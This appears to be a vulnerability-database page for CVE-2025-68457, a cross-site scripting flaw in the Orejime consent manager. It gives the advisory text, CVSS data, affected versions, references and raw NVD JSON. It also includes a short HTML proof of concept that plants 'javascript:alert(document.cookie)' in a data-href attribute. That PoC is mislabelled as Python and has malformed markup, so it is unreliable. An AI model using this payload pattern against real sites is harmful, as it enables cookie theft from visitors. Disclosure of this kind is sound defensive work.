CVE-2025-68457

Description

Orejime is a consent manager that focuses on accessibility. On HTML elements handled by Orejime prior to version 2.3.2, one could run malicious code by embedding `javascript:` code within data attributes. When consenting to the related purpose, Orejime would turn data attributes into unprefixed ones (i.e. `data-href` into `href`), thus executing the code. This shouldn't have any impact on most setups, as elements handled by Orejime are generally hardcoded. The problem would only arise if somebody could inject HTML code within pages. The problem has been patched in version 2.3.2. As a workaround, the problem can be fixed outside of Orejime by sanitizing attributes which could contain executable code.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:boscop:orejime:*:*:*:*:*:node.js:*:* - VULNERABLE

Orejime < 2.3.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!DOCTYPE html> <html> <head> <title>CVE-2025-68457 PoC</title>  <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/orejime.js"></script> </head> <body>   <div class="orejime-App" data-config="config"> <a href="https://legitimate-site.com" data-href="javascript:alert(document.cookie)" data-orejime="marketing"> Click me (malicious payload in data-href) </a> </div> <script> // Orejime configuration var config = { apps: [ { name: "marketing", title: "Marketing Cookies", cookies: ["marketing_*"], required: false } ] }; // Initialize Orejime window.orejimeConfig = config; </script>  </script> </body> </html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68457/
[4] VulDB https://vuldb.com/cve/CVE-2025-68457
[5] https://github.com/boscop-fr/orejime/issues/142
[6] https://github.com/boscop-fr/orejime/pull/143
[7] https://github.com/boscop-fr/orejime/security/advisories/GHSA-72mh-hgpm-6384

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68457", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:53.393", "lastModified": "2026-01-13T17:15:59.040", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Orejime is a consent manager that focuses on accessibility. On HTML elements handled by Orejime prior to version 2.3.2, one could run malicious code by embedding `javascript:` code within data attributes. When consenting to the related purpose, Orejime would turn data attributes into unprefixed ones (i.e. `data-href` into `href`), thus executing the code. This shouldn't have any impact on most setups, as elements handled by Orejime are generally hardcoded. The problem would only arise if somebody could inject HTML code within pages. The problem has been patched in version 2.3.2. As a workaround, the problem can be fixed outside of Orejime by sanitizing attributes which could contain executable code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:boscop:orejime:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.3.2", "matchCriteriaId": "06B66BE4-1528-4C51-8CB6-ABDC27E2BF50"}]}]}], "references": [{"url": "https://github.com/boscop-fr/orejime/issues/142", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/boscop-fr/orejime/pull/143", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/boscop-fr/orejime/security/advisories/GHSA-72mh-hgpm-6384", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}